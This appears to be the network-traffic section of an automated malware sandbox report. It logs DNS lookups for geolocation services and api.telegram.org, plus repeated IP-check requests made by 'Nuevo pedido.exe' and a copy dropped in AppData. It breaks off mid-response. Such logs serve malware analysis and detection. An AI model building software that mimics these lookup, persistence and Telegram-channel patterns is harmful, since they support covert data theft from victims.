                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET1.1.1.1192.168.2.40xc852No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET1.1.1.1192.168.2.40xc852No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:12.867985964 CET1.1.1.1192.168.2.40x8621No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                          • api.telegram.org
                                                                                                                                          • checkip.dyndns.org
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449733193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:00.970580101 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:01.428589106 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 211f565b43e1eb70ba6fa4a4a1098ff0
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 9, 2025 16:36:01.433715105 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 9, 2025 16:36:01.534163952 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 0b9d9243521b7da725ea78affb4ef03b
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 9, 2025 16:36:01.743089914 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 0b9d9243521b7da725ea78affb4ef03b
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 9, 2025 16:36:02.806159973 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 9, 2025 16:36:04.052448034 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 453703f0ec4f15828ed2dacd2189e95b
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 9, 2025 16:36:04.123101950 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 453703f0ec4f15828ed2dacd2189e95b
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449738193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:04.697592020 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 9, 2025 16:36:05.179434061 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:05 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 1aaaf96c8efa1919d1afa6a7dec37f84
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449740193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:05.618122101 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:06.122505903 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:06 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: bc18746e2801475e74fb745fbfc25862
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 9, 2025 16:36:06.127437115 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 9, 2025 16:36:06.247389078 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:06 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 175692431c13ec49331ffaea168f8f95
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 9, 2025 16:36:07.084819078 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 9, 2025 16:36:07.322189093 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:07 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: fbf4bcd0bf30dd9027cfe7b39684ff4c
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449741193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:05.854659081 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 9, 2025 16:36:06.369398117 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:06 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: a31ca3cdf76c8fa07dba16cb12cd7d41
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449744193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:07.022197962 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:07.557416916 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:07 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: d3a6a22ce7f550f4f5bada3cd1b62acd
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449747193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:08.161607981 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 9, 2025 16:36:08.635428905 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:08 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 597fc91d00f22d6ee7d42473b6490ce7
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449748193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:08.299448013 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:08.771614075 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:08 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: caa2266df07de448d2888e3f23cd9871
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449751193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:09.278423071 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:09.768116951 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:09 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: fb58b2a6934cf63c7f83560e3de34cdd
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449752193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:09.381845951 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:09.846118927 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:09 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 59c276d3f4db5d55a66815a55b67d233
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.449755193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:10.384701014 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:10.866734028 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:10 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: c0c10931d47f7653e5848ea03949f1f2
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.449756193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:10.474456072 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:10.967573881 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:10 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: d4b3e1f75593411221e05540ede84a11
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.449759193.122.130.0807764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:11.640180111 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:12.117563963 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:12 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: fb56b72d1cee8e9f0352a17db895ee54
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.449760193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:11.684587002 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:12.156908989 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:12 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 7b9e0da751d01b705d276a127787e23e
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.449764193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:12.913570881 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:13.371639013 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
